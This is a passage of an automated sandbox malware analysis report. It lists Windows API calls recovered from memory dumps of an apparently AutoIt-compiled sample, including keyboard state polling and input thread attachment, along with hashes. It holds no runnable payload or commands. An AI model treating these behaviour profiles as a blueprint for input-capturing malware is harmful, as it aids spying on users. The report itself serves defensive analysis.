                                                                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                • DeleteObject.GDI32(00000000), ref: 00470A04
                                                                                                • DestroyIcon.USER32(00530055), ref: 00470A1C
                                                                                                • DeleteObject.GDI32(FFA78017), ref: 00470A34
                                                                                                • DestroyWindow.USER32(004E0045), ref: 00470A4C
                                                                                                • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1237572874-0
                                                                                                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                APIs
                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                • String ID:
                                                                                                • API String ID: 2706829360-0
                                                                                                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: State$Async$Keyboard
                                                                                                • String ID:
                                                                                                • API String ID: 541375521-0
                                                                                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3413494760-0
                                                                                                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                • String ID: AU3_FreeVar
                                                                                                • API String ID: 2634073740-771828931
                                                                                                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                APIs
                                                                                                • CoInitialize.OLE32 ref: 0046C63A
                                                                                                • CoUninitialize.OLE32 ref: 0046C645
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                • API String ID: 2294789929-1287834457
                                                                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                APIs
                                                                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                • ReleaseCapture.USER32 ref: 0047116F
                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                • API String ID: 2483343779-2107944366
                                                                                                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                • _wcslen.LIBCMT ref: 00450720
                                                                                                • _wcscat.LIBCMT ref: 00450733
                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                • String ID: -----$SysListView32
                                                                                                • API String ID: 4008455318-3975388722
                                                                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                • GetParent.USER32 ref: 00469C98
                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                • GetParent.USER32 ref: 00469CBC
                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 2360848162-1403004172
                                                                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                • String ID:
                                                                                                • API String ID: 262282135-0
                                                                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 312131281-0
                                                                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                APIs
                                                                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                                                • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                • String ID:
                                                                                                • API String ID: 3771399671-0
                                                                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                • String ID:
                                                                                                • API String ID: 2156557900-0
                                                                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
